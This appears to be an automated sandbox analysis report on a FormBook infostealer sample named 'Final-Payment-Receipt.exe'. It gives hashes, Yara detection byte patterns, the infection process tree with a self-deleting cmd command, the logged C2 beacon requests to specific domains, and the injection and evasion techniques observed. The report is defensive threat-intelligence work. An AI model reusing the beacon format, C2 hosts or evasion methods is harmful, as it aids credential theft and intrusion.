
Analysis Report Final-Payment-Receipt.exe

Overview

General Information

Sample Name: Final-Payment-Receipt.exe
Analysis ID: 320833
MD5: 8f5d29001a9f5d4f62b47af6442be5ab
SHA1: 4838464ffe421aad7c9d73ba19420b7e9c2c427d
SHA256: 8e01fb320ffa60c0157bfc9aa8c6de43a7802d7f408de907a0d6338ce25c239c
Tags: exe

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
System process connects to network (likely due to code injection or exploit)
Yara detected AntiVM_3
Yara detected FormBook
Initial sample is a PE file and has a suspicious name
Injects a PE file into a foreign processes
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect virtualization through RDTSC time measurements
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Startup

  • System is w10x64
  • Final-Payment-Receipt.exe (PID: 1692 cmdline: 'C:\Users\user\Desktop\Final-Payment-Receipt.exe' MD5: 8F5D29001A9F5D4F62B47AF6442BE5AB)
    • Final-Payment-Receipt.exe (PID: 5764 cmdline: C:\Users\user\Desktop\Final-Payment-Receipt.exe MD5: 8F5D29001A9F5D4F62B47AF6442BE5AB)
      • explorer.exe (PID: 3472 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • wlanext.exe (PID: 4732 cmdline: C:\Windows\SysWOW64\wlanext.exe MD5: CD1ED9A48316D58513D8ECB2D55B5C04)
          • cmd.exe (PID: 5932 cmdline: /c del 'C:\Users\user\Desktop\Final-Payment-Receipt.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 1132 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
00000001.00000002.261423165.0000000000400000.00000040.00000001.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
00000001.00000002.261423165.0000000000400000.00000040.00000001.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x1b337:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1c33a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000001.00000002.261423165.0000000000400000.00000040.00000001.sdmp | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
  • 0x18419:$sqlite3step: 68 34 1C 7B E1
  • 0x1852c:$sqlite3step: 68 34 1C 7B E1
  • 0x18448:$sqlite3text: 68 38 2A 90 C5
  • 0x1856d:$sqlite3text: 68 38 2A 90 C5
  • 0x1845b:$sqlite3blob: 68 53 D8 7F 8C
  • 0x18583:$sqlite3blob: 68 53 D8 7F 8C
00000003.00000002.490449553.0000000002EB0000.00000040.00000001.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
00000003.00000002.490449553.0000000002EB0000.00000040.00000001.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x1b337:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1c33a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00

Unpacked PEs

Source | Rule | Description | Author | Strings
1.2.Final-Payment-Receipt.exe.400000.0.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
1.2.Final-Payment-Receipt.exe.400000.0.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x8ae8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x8d62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x14885:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x14371:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x14987:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x14aff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x977a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x135ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xa473:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x1a537:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1b53a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
1.2.Final-Payment-Receipt.exe.400000.0.unpack | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
  • 0x17619:$sqlite3step: 68 34 1C 7B E1
  • 0x1772c:$sqlite3step: 68 34 1C 7B E1
  • 0x17648:$sqlite3text: 68 38 2A 90 C5
  • 0x1776d:$sqlite3text: 68 38 2A 90 C5
  • 0x1765b:$sqlite3blob: 68 53 D8 7F 8C
  • 0x17783:$sqlite3blob: 68 53 D8 7F 8C
1.2.Final-Payment-Receipt.exe.400000.0.raw.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
1.2.Final-Payment-Receipt.exe.400000.0.raw.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x1b337:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1c33a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00

Sigma Overview

No Sigma rule has matched

Signature Overview

AV Detection:

Multi AV Scanner detection for submitted file
Source: Final-Payment-Receipt.exe | ReversingLabs: Detection: 34%
Yara detected FormBook
Source: Yara match | File source: 00000001.00000002.261423165.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.490449553.0000000002EB0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.263189244.0000000000F10000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.491351261.00000000035F0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.491250685.00000000035C0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.263151938.0000000000EE0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.233139122.00000000033B9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 1.2.Final-Payment-Receipt.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.Final-Payment-Receipt.exe.400000.0.raw.unpack, type: UNPACKEDPE
Machine Learning detection for sample
Source: Final-Payment-Receipt.exe | Joe Sandbox ML: detected
Source: 1.2.Final-Payment-Receipt.exe.400000.0.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe | Code function: 4x nop then mov dword ptr [ebp-18h], 00000000h
Source: global traffic | HTTP traffic detected: GET /71m/?Rzr0iD=xuMbXRqvcjTkPYem20N3vsgWyUob49TNzNry+QjPYNTyHJJexkEaphWMorU+NKluO0/a&ZL3=rVvxt090-21lhr HTTP/1.1 | Host: www.wacrox.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /71m/?Rzr0iD=gir/TGf45q640hyvaYoOLmcQvbxfbyF+CK0IasCqTcsJdBCY+OvZ/ZhMnEHJcPXMDgdk&ZL3=rVvxt090-21lhr HTTP/1.1 | Host: www.trumpingitagain.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /71m/?Rzr0iD=rhJBnfA/e5RktQ98+ow2gk+rbfXq49mIcD+nNtl3IG/t9WffOOBTTAV63Ad5zEG8kC/4&ZL3=rVvxt090-21lhr HTTP/1.1 | Host: www.themindofafunnygirl.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: Joe Sandbox View | ASN Name: DREAMSCAPE-AS-APDreamscapeNetworksLimitedAU
Source: Joe Sandbox View | ASN Name: AUTOMATTICUS
Source: Joe Sandbox View | ASN Name: NAMECHEAP-NETUS
Source: unknown | DNS traffic detected: queries for: g.msn.com
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Thu, 19 Nov 2020 21:20:27 GMT | Server: Apache/2.4.29 (Ubuntu) | Content-Length: 327 | Connection: close | Content-Type: text/html; charset=utf-8 | Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /71m/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: explorer.exe, 00000002.00000000.247061311.000000000BC36000.00000002.00000001.sdmp | String found in binary or memory: http://fontfabrik.com
Source: Final-Payment-Receipt.exe, 00000000.00000002.232733869.00000000023B1000.00000004.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: explorer.exe, 00000002.00000000.247061311.000000000BC36000.00000002.00000001.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: explorer.exe, 00000002.00000000.247061311.000000000BC36000.00000002.00000001.sdmp | String found in binary or memory: http://www.carterandcone.coml
Source: explorer.exe, 00000002.00000000.247061311.000000000BC36000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com
Source: explorer.exe, 00000002.00000000.247061311.000000000BC36000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers
Source: explorer.exe, 00000002.00000000.247061311.000000000BC36000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/?
Source: explorer.exe, 00000002.00000000.247061311.000000000BC36000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: explorer.exe, 00000002.00000000.247061311.000000000BC36000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
Source: explorer.exe, 00000002.00000000.247061311.000000000BC36000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers8
Source: explorer.exe, 00000002.00000000.247061311.000000000BC36000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers?
Source: explorer.exe, 00000002.00000000.247061311.000000000BC36000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designersG
Source: explorer.exe, 00000002.00000000.247061311.000000000BC36000.00000002.00000001.sdmp | String found in binary or memory: http://www.fonts.com
Source: explorer.exe, 00000002.00000000.247061311.000000000BC36000.00000002.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn
Source: explorer.exe, 00000002.00000000.247061311.000000000BC36000.00000002.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: explorer.exe, 00000002.00000000.247061311.000000000BC36000.00000002.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: explorer.exe, 00000002.00000000.247061311.000000000BC36000.00000002.00000001.sdmp | String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: explorer.exe, 00000002.00000000.247061311.000000000BC36000.00000002.00000001.sdmp | String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: explorer.exe, 00000002.00000000.247061311.000000000BC36000.00000002.00000001.sdmp | String found in binary or memory: http://www.goodfont.co.kr
Source: explorer.exe, 00000002.00000000.247061311.000000000BC36000.00000002.00000001.sdmp | String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: explorer.exe, 00000002.00000000.247061311.000000000BC36000.00000002.00000001.sdmp | String found in binary or memory: http://www.sajatypeworks.com
Source: explorer.exe, 00000002.00000000.247061311.000000000BC36000.00000002.00000001.sdmp | String found in binary or memory: http://www.sakkal.com
Source: explorer.exe, 00000002.00000000.247061311.000000000BC36000.00000002.00000001.sdmp | String found in binary or memory: http://www.sandoll.co.kr
Source: explorer.exe, 00000002.00000000.247061311.000000000BC36000.00000002.00000001.sdmp | String found in binary or memory: http://www.tiro.com
Source: explorer.exe, 00000002.00000000.247061311.000000000BC36000.00000002.00000001.sdmp | String found in binary or memory: http://www.typography.netD
Source: explorer.exe, 00000002.00000000.247061311.000000000BC36000.00000002.00000001.sdmp | String found in binary or memory: http://www.urwpp.deDPlease
Source: explorer.exe, 00000002.00000000.247061311.000000000BC36000.00000002.00000001.sdmp | String found in binary or memory: http://www.zhongyicts.com.cn
Source: wlanext.exe, 00000003.00000002.492344982.00000000041AF000.00000004.00000001.sdmp | String found in binary or memory: https://themindofafunnygirl.com/71m/?Rzr0iD=rhJBnfA/e5RktQ98

E-Banking Fraud:

Yara detected FormBook
Source: Yara match | File source: 00000001.00000002.261423165.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.490449553.0000000002EB0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.263189244.0000000000F10000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.491351261.00000000035F0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.491250685.00000000035C0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.263151938.0000000000EE0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.233139122.00000000033B9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 1.2.Final-Payment-Receipt.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.Final-Payment-Receipt.exe.400000.0.raw.unpack, type: UNPACKEDPE

System Summary:

          Malicious sample detected (through community Yara rule)Show sources
          Source: 00000001.00000002.261423165.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.261423165.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000003.00000002.490449553.0000000002EB0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000003.00000002.490449553.0000000002EB0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.263189244.0000000000F10000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.263189244.0000000000F10000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000003.00000002.491351261.00000000035F0000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000003.00000002.491351261.00000000035F0000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000003.00000002.491250685.00000000035C0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000003.00000002.491250685.00000000035C0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.263151938.0000000000EE0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.263151938.0000000000EE0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.233139122.00000000033B9000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.233139122.00000000033B9000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.2.Final-Payment-Receipt.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.2.Final-Payment-Receipt.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.2.Final-Payment-Receipt.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.2.Final-Payment-Receipt.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Initial sample is a PE file and has a suspicious nameShow sources
          Source: initial sampleStatic PE information: Filename: Final-Payment-Receipt.exe
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_00419D70 NtCreateFile,
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_00419E20 NtReadFile,
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_00419EA0 NtClose,
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_00419F50 NtAllocateVirtualMemory,
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_00419DC2 NtCreateFile,
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_00419E1F NtReadFile,
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_00419F4C NtAllocateVirtualMemory,
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013F9910 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013F99A0 NtCreateSection,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013F9860 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013F9840 NtDelayExecution,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013F98F0 NtReadVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013F9A20 NtResumeThread,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013F9A00 NtProtectVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013F9A50 NtCreateFile,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013F9540 NtReadFile,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013F95D0 NtClose,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013F9710 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013F97A0 NtUnmapViewOfSection,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013F9780 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013F9660 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013F96E0 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013F9950 NtQueueApcThread,
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013F99D0 NtCreateProcessEx,
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013F9820 NtEnumerateKey,
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013FB040 NtSuspendThread,
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013F98A0 NtWriteVirtualMemory,
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013F9B00 NtSetValueKey,
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013FA3B0 NtGetContextThread,
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013F9A10 NtQuerySection,
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013F9A80 NtOpenDirectoryObject,
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013FAD30 NtSetContextThread,
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013F9520 NtWaitForSingleObject,
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013F9560 NtWriteFile,
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013F95F0 NtQueryInformationFile,
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013F9730 NtQueryVirtualMemory,
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013FA710 NtOpenProcessToken,
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013FA770 NtOpenThread,
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013F9770 NtSetInformationFile,
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013F9760 NtOpenProcess,
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013F9FE0 NtCreateMutant,
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013F9610 NtEnumerateValueKey,
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013F9670 NtQueryInformationProcess,
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013F9650 NtQueryValueKey,
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013F96D0 NtCreateKey,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_03759A50 NtCreateFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_03759910 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_037599A0 NtCreateSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_03759860 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_03759840 NtDelayExecution,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_03759710 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_03759FE0 NtCreateMutant,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_03759780 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_03759660 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_03759650 NtQueryValueKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_037596E0 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_037596D0 NtCreateKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_03759540 NtReadFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_037595D0 NtClose,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_03759B00 NtSetValueKey,
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 3_2_0375A3B0 NtGetContextThread
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 3_2_03759A20 NtResumeThread
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 3_2_03759A10 NtQuerySection
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 3_2_03759A00 NtProtectVirtualMemory
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 3_2_03759A80 NtOpenDirectoryObject
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 3_2_03759950 NtQueueApcThread
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 3_2_037599D0 NtCreateProcessEx
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 3_2_0375B040 NtSuspendThread
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 3_2_03759820 NtEnumerateKey
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 3_2_037598F0 NtReadVirtualMemory
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 3_2_037598A0 NtWriteVirtualMemory
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 3_2_0375A770 NtOpenThread
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 3_2_03759770 NtSetInformationFile
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 3_2_03759760 NtOpenProcess
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 3_2_03759730 NtQueryVirtualMemory
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 3_2_0375A710 NtOpenProcessToken
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 3_2_037597A0 NtUnmapViewOfSection
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 3_2_03759670 NtQueryInformationProcess
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 3_2_03759610 NtEnumerateValueKey
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 3_2_03759560 NtWriteFile
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 3_2_0375AD30 NtSetContextThread
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 3_2_03759520 NtWaitForSingleObject
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 3_2_037595F0 NtQueryInformationFile
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 3_2_02EC9EA0 NtClose
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 3_2_02EC9E20 NtReadFile
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 3_2_02EC9F50 NtAllocateVirtualMemory
